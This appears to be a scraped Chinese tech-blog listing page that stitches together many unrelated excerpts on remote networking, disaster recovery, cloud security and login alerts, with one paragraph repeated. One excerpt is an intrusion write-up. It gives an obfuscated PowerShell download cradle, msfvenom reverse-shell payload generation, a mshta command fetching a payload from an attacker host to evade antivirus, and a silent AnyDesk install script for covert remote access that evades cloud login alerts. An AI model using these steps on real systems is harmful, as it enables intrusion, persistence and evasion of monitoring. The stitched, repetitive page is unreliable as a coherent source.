声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
当谈到架构的高可用时,无论是高可用计算架构,还是高可用存储架构,其本质的设计目的都是为了解决部分服务器故障的场景下,如何保证系统能够继续提供服务。但在一些极端场景下,有可能所有服务器都出现故障。例如,典型的有机房断电、机房火灾、地震、水灾……这些极端情况会导致某个系统所有服务器都故障,或者业务整体瘫痪,而且即使有其他地区的备份,把备份业务系统全部恢复到能够正常提供业务,花费的时间也比较长,可能是半小时,也可能是一天。因为备份系统平时不对外提供服务,可能会存在很多隐藏的问题没有发现。如果业务期望达到即使在此类灾难性故障的情况下,业务也不受影响,或者在几分钟内就能够很快恢复,那么就需要设计异地多活架构。
无论是高可用计算架构,还是高可用存储架构,其本质的设计目的都是为了解决部分服务器故障的场景下,如何保证系统能够继续提供服务。但在一些极端场景下,有可能所有服务器都出现故障。例如,典型的有机房断电、机房火灾、地震、水灾……这些极端情况会导致某个系统所有服务器都故障,或者业务整体瘫痪,而且即使有其他地区的备份,把备份业务系统全部恢复到能够正常提供业务,花费的时间也比较长,可能是半小时,也可能是12小时。因为备份系统平时不对外提供服务,可能会存在很多隐藏的问题没有发现。如果业务期望达到即使在此类灾难性故障的情况下,业务也不受影响,或者在几分钟内就能够很快恢复,那么就需要设计异地多活架构。
主要是想的自己小博客也没啥机密信息,不会真有人无聊到来黑吧,不会吧不会吧,结果还真有。头晚上发现被破解了也就去改了下root密码,就不想管了,结果第二天中午异地登录了,绷不住了,估计昨晚登录了后还留了其他超级权限账号,还是得想想办法。
目录 课程目标 1.服务器面临的安全挑战 2016年服务器安全健康状况 服务器面临的安全挑战 1.高危漏洞攻击 2.开放端口攻击 3.恶意木马攻击 2.服务器安全管理123 服务器安全管理的五种方式 1.及时打补丁 2.修改默认的账号密码 3.启动防火墙 4.关闭不必要的服务、端口 5.检测服务器日志 3.通过安骑士发现登录风险 阿里云安骑士的主要功能 阿里云安骑士架构 1.异地登录 2.暴力破解 3.登录IP白名单 4.通过安骑士修复常见漏洞 常见漏洞简介 漏洞管理流程 安骑士漏洞管理主要功
运维工程师对堡垒机一定不陌生,它对我们运维工作效率有很大的提升。堡垒机的操作相对来说还是比较简单的,没有特别复杂的流程。但是它的功能却十分强大,以至于很多企业已经无法离开它。那么怎样通过堡垒机远程服务器数据库呢?对于这个问题,下文将会有一个详细介绍。
谈到“异地组网”这个问题,其实已经有很多成熟的解决方案,包括最简单的拉光纤物理相连、向日葵异地组网等等。这些解决方案虽然稳定性和使用体验都极度让人舒适,但是实现的代价略微有点大,尤其财大气粗的光纤物理直接相连。不过对于某些大公司的异地数据中心互联,这仍然是最被认可的解决方案。至于向日葵异地组网,有点类似于把远程服务环境和本地环境同时连入一个网络,然后在形式上实现局域网化。由于这一解决方案往往依赖于一个由第三方提供的中心节点服务,这种局域网的带宽、速度和使用体验很大程度上受限于购买的套餐级别。那么,是否存在一种造价较低,速度和使用体验都较佳的解决方案呢?答案自然是存在的,只是有点曲线而已。
最近阅读了一本架构方面的入门图书叫《从零开始学架构:照着做,你也能成为架构师》,部分内容比较不错,先做书摘总结,以便加深印象与未来回顾学习。
pip install -r requirements.txt 提示找不到 requirements.txt
3.在腾讯云控制台中的主机安全列表中的入侵检测的异地登陆查看历史登录信息,可以看到服务器的ip或者名称,来源ip,来源地,登录的用户名,登陆的时间,危险等级,状态,可进行的操作。
本文主要介绍如何使用Pycharm进行远程开发,使用内网穿透工具实现异地连接服务器编译代码与项目同步。
灾备: 是指容灾和备份。容灾是为了在遭遇灾害时能保证信息系统能正常运行,帮助企业实现业务7*24小时连续性的目标,备份是为了应对灾难来临时造成的数据丢失问题。容灾备份产品的最终目标是帮助企业应对人为误操作、软件错误、病毒入侵等“软”性灾害以及硬件故障、自然灾害等“硬”性灾害。
翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件,存储着这个定位服务平台的相关配置信息,包括MSSQL数据库的用户和密码。 ipconfig /all命令下发现这台主机有两个网卡,公网:47.**.***.77,内网:10.28.176.131,两个内网DNS服务器:10.143.22.116、10.143.22.118,并且可以与外网进行通讯。 0x04 绕过主动防御上线 测试了以前常用的Powershell混淆法,不过已经被360主动防御拦了,微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性,一旦被公布被查杀和拦截也正常(早晚的事)。 powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b) web_delivery、hta_server模块肯定更不行了,最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话,执行getsystem即可提升为SYSTEM,执行命令如下。 1、生成载荷并编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin cat /tmp/shellcode.bin | base64 -w 0 2、配置监听模块参数 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 155.**.***.16 set lport 443 exploit 3、目标主机执行载荷 mshta http://155.**.***.16:8888/bypass360.hta 注:mshta白名单貌似只能用x86的Payload,执行成功后会自动迁移至32位的rundll32.exe进程,所以就可能会出现由werfaylt.exe弹出的下图报错,所以个人建议在得到Session后迁移至x64进程,并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。 0x05 绕过异地登录提醒 虽然已经是最高权限了,但由于这台主机为阿里云,且存在360主动防御,就不添加用户进行远程桌面连接了,因为360会拦截添加用户,而且远程桌面连接时会触发异地登录提醒。 为避免触发异地登录提醒,我们可以利用AnyDesk来进行绕过,将AnyDesk.exe和静默安装批处理文件上传至可读写目录中,然后在命令行下执行该批处理文件获取连接ID。 注:如果等待时间过长,一直卡着不动获取不到连接ID时可结束当前命令行,重新进入命令行执行anydesk --get-id命令来获取连接ID。 @echo off AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password choice /t 10 /d y /n >nul for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面,成功的绕过了阿里云主机的异地登录提醒。 至此,全文结束,内网就不搞了!!!
导读:《架构设计》系列为极客时间李运华老师《从0开始学架构》课程笔记。本文为第七部分,主要介绍异地多活,异地多活缩短了时延,提高可用性,但是带来复杂度和成本无疑是巨大的,不是一般公司可以承受的,只有在对可用性要求特别高的业务场景才建议使用。
说起远程桌面、异地组网、内网穿透等等服务,大家脑海中第一反应是哪款产品,确实,现在市面上同类产品不少,但同时支持组网跟穿透的产品几乎没有。节点小宝作为一款创新型的远程管理工具,凭借其使用简单,高速传输和安全等特点,帮我们解决无公网IP下的远程运维和服务访问。
我们先来了解一下Linux secure日志中比较常见的登录日志,如下两条登录记录作为示例:
简单来说 redis 就是一个数据库,不过与传统数据库不同的是 redis 的数据是存在内存中的,所以读写速度非常快,因此 redis 被广泛应用于缓存方向,redis默认端口是6379,由于redis被广泛使用,自然而然安全区域也备受挑战。
在前一篇文章中我们讲解了如何在Linux中使用Docker搭建个人IT-Tools工具箱并且结合cpolar内网穿透实现公网访问。
异地备份文件,已经是一个常见的的需求了,本文的目的是,仓库的重要数据,要异地备份到总部的群晖NAS。
DashDot是一款简单、实用的开源现代服务器仪表盘,主要应用于小型 VPS 和私人服务器(比如说NAS),它是一个界面非常漂亮的监控服务器面板!
[root@78778e06dc0a /]# yum install vsftpd -y
服务器入侵这个名词相信大家应该都再熟悉不过了,有些黑客入侵服务器是为了盗取游戏版本贩卖给他人,有些是为了盗取游戏数据对服务器使用者进行敲诈勒索,更有些黑客直接是对服务器数据进行破坏性的操作,直接是将服务器数据直接删甚至格盘等操作。总而言之这些黑客入侵都是为了自己的私欲,对用户的财产安全、隐私安全等都带来了极大的风险和危害,所以服务器防入侵安全也是每个用户必须要提前预防以及避免的。
本篇文章我们将在Linux上使用Docker在本地部署一个开源的PDF工具——Stirling PDF,并且结合cpolar的内网穿透实现公网随时随地访问。
GoLand是由JetBrains推出的一款专为Go语言开发设计的集成开发环境(IDE)。它集成了多种高级功能,包括但不限于智能代码补全、代码分析和高级调试功能。可以帮助编写Go语言更加便捷,支持各种高级IDE功能和各种Go语言框架。
在部署软件项目的过程中,经常会遇到客户的单位没有公网IP,但是客户又需要做到像云服务器一样可以随时随地远程访问的情况。
随着云时代的到来,目前越来越多的企业选择上云,然而企业上云往往面临各种各样的安全威胁,密码泄露、账号共享、数据丢失、系统漏洞、外部攻击等等。
异地组网,也算是老生常谈的话题了,但是每次都会有不同的网络状况、不同品牌的设备,不同的客户需求,所以每次的记录和分享也就显得有些必要了。
开发中很多时候都会使用到数据库,所以选择一个好用的数据库设计工具会让工作效率翻倍。在当今数字化时代,数据库管理是许多企业和个人项目的核心。设计一个有效的数据库实体关系图对于数据管理至关重要。
本篇文章将dockercompose结合cpolar内网穿透软件实现公网访问docker compose web可视化界面,更直观的进行远程编写。
作为程序员,在日常工作中,需要借助一些工具来提高我们工作效率,IT-Tools是为开发人员度身打造的一套便捷在线工具。它提供全面功能,使开发者能以更高效方式完成任务。经由IT-Tools,开发人员能轻松应对各类技术挑战,享受工作中的便利与灵活。
在这个特殊的新年,为了最大限度减少人员流动聚集,很多企业选择“云开工”模式,但远程办公虽然保障了“人身安全”,却存在一定的“信息安全”风险,涉及员工异地访问的身份识别、多地分散的终端安全防护、越权操作等问题,事关企业的核心数据资产安全。
C/S的学习已经结束有一段时间了,现在正在进行B/S的学习,那么C/S和B/S又有什么样的不同呢?
本篇文章将介绍如何使用Docker本地部署Focalboard项目管理工具,并且结合cpolar内网穿透进行公网访问,实现团队协作,提高工作效率!
在上一个篇记录中,我通过WireGuard实现的异地组网,实现了不同地域、不同网络、网络类型不相同的云服务器,实现互联。
安全没有绝对,如何保护好企业的数据安全是摆在管理员面前的一道难题,根据个经历可以分以下两个方面来提升企业的安全等级。
cpolar是一款拥有远程控制和内网穿透功能的软件。而且还可以监控端口的HTTP请求,利用实时的cpolar Web UI开发者工具,让您调试代码更容易。您可以监听所有隧道上的HTTP消息包,分析消息包的结构内容,找出问题点。还可以单击重放(Replay)按钮,重新发送该HTTP信令请求。
Community Edition允许您在本地服务器上安装ONLYOFFICE文档,并将在线编辑器与ONLYOFFICE协作平台或其他流行系统集成。它是一个在线办公套件,包括文本、电子表格和演示文稿的查看器和编辑器,完全兼容office Open XML格式:.docx、.xlsx、.pptx,并支持实时协作编辑。
作为全球领先的在线旅游企业,携程注重服务质量,并拥有全球最大的旅游呼叫中心,分别部署在国内自建系统、国内和国外第三方云服务平台上。呼叫中心每天承接着上百万通的通话,电话服务系统是整个呼叫中心中非常重要的一套系统,服务着数万客服座席,系统的稳定性至关重要。
localsend是一款基于局域网的文件传输工具,它利用局域网的高速传输特性,实现了设备之间的快速文件传输,本篇我们将结合cpolar内网穿透实现公网远程访问传输。与传统的蓝牙传输相比,localsend具有更高的传输速度和更稳定的连接性能。同时,它还支持跨平台使用,无论是Windows、macOS还是Linux,都可以轻松使用localsend进行文件传输。
今天让同事去Beta环境实践模拟线上环境多机房异地备份,我们有一个统一登录的数据库,很多产品的登录都基于这个库做的统一登录,所以是比较重要的一个数据库,所以让他做前端代码和数据库的异地备份,代码好说,跟上线一样,从git库pull代码做同步更新就好,数据库则需要跨机房做异地远程同步并备份。
月初直播看完了《2023腾讯·技术创作特训营 第一期 | 成为优秀技术创作者有捷径吗?》讲座,听完嘉宾们分享的方法论之后对写作产生了新的认知,决定借这个机会分享一下近期自己基于 Tailscale 进行异地组网的一些折腾吧
事情是这样的,昨天晚上我收到了腾讯云的异地登录告警,一开始我并不是太在意。腾讯云经常会有一些误报告警,不怪腾讯云,有时候我带着笔记本回老家,笔记本竟然没睡死,在合上的状态连上了我的服务器(目测是 VSCode 远程开发),而老家的电信宽带竟然有时候 ip 是其他城市的,就会引起异地登录报警。
这里主要利用基于PHP开发的KODExplorer来搭建私有云,蒲公英异地组网实现服务的远程访问。
tailscale管理端:https://login.tailscale.com/admin/machines
本篇文章介绍如何在本地部署开源GPT4free,并且结合Cpolar内网穿透工具实现公网远程访问本地AI聊天服务。
事务问题:一致性。 【问题】 如何保证主机和从机的数据一致???主从复制的延迟性问题。
相信很多小伙伴都使用QQ聊天工具,那是否遇到过这样的场景呢?当在一台电脑上已经登录QQ,此时因为某些原因需要在另一台电脑再登录相同号码的QQ,登录成功后会发现之前电脑上的QQ下线了。这就是QQ限制了同一个号码在电脑上不能重复登录,我们的Web程序也可以进行重复登录的限制,那么本次任务就是用过滤器和监听器来解决重复登录问题。具体任务如下:
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
实时音视频
即时通信 IM
